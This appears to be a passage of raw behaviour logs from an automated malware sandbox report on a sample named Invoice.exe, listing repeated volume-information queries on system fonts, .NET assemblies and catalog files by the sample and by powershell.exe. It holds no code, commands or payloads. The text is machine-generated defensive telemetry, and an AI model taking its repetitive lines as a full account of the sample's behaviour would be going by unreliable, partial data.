Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
